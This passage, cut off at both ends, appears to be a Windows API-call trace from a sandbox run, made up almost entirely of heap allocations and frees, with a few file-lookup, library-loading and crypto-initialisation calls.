lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0215.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0215.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0215.161] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0215.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0215.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0215.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0215.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0215.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0215.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0215.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0215.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0215.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0215.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0215.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0215.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0215.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0215.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0215.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0215.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0215.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0215.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0215.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0215.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0215.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0215.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0215.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0215.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0215.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0215.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0215.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0215.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0215.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0215.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0215.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0215.162] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0215.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0215.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0215.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0215.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0215.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0215.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0215.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0215.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0215.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0215.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0215.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0215.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0215.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0215.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0215.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0215.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0215.163] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0215.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0215.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0215.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0215.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0215.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0215.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0215.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0215.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0215.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0215.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0215.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0215.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0215.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0215.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0215.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0215.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0215.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0215.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0215.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0215.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0215.189] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/Z3NyFrC6_WxtuHo-dMOg.ots", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ae99980, ftCreationTime.dwHighDateTime=0x1d5e2c2, ftLastAccessTime.dwLowDateTime=0xc281a560, ftLastAccessTime.dwHighDateTime=0x1d5f0de, ftLastWriteTime.dwLowDateTime=0xc281a560, ftLastWriteTime.dwHighDateTime=0x1d5f0de, nFileSizeHigh=0x0, nFileSizeLow=0xcdd9, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="Z3NyFrC6_WxtuHo-dMOg.ots", cAlternateFileName="Z3NYFR~1.OTS")) returned 0xa87250 [0215.189] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0215.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0215.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0215.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0215.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0215.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0215.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0215.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0215.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0215.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0215.190] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0215.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0215.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0215.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0215.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0215.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0215.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0215.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0215.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0215.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0215.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0215.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0215.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0215.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0215.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0215.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0215.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0215.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0215.191] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0215.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0215.191] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0215.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0215.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0215.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0215.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0215.191] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0215.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0215.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0215.191] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0215.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0215.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0215.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0215.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0215.191] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0215.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0215.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0215.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0215.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0215.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0215.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0215.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0215.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0215.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0215.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0215.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0215.192] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0215.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0215.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0215.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0215.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0215.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0215.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0215.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0215.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0215.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0215.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0215.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0215.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0215.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0215.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0215.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0215.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0215.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0215.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0215.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0215.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0215.192] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0215.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0215.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0215.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0215.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0215.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0215.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0215.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0215.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0215.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0215.193] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0215.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0215.193] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0215.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0215.193] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0215.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0215.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0215.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0215.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d08 [0215.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0215.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0215.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0215.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0215.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0215.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0215.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0215.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0215.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0215.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0215.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0215.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0215.194] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0215.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0215.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0215.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0215.194] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0215.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0215.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0215.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0215.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0215.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0215.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0215.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0215.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0215.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0215.194] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0215.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0215.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0215.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0215.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0215.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0215.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0215.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0215.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0215.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0215.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0215.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0215.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0215.195] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0215.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0215.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0215.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0215.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0215.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0215.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0215.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0215.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0215.196] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0215.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0215.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0215.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0215.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0215.196] HeapFree (in: hHeap=0x970000, 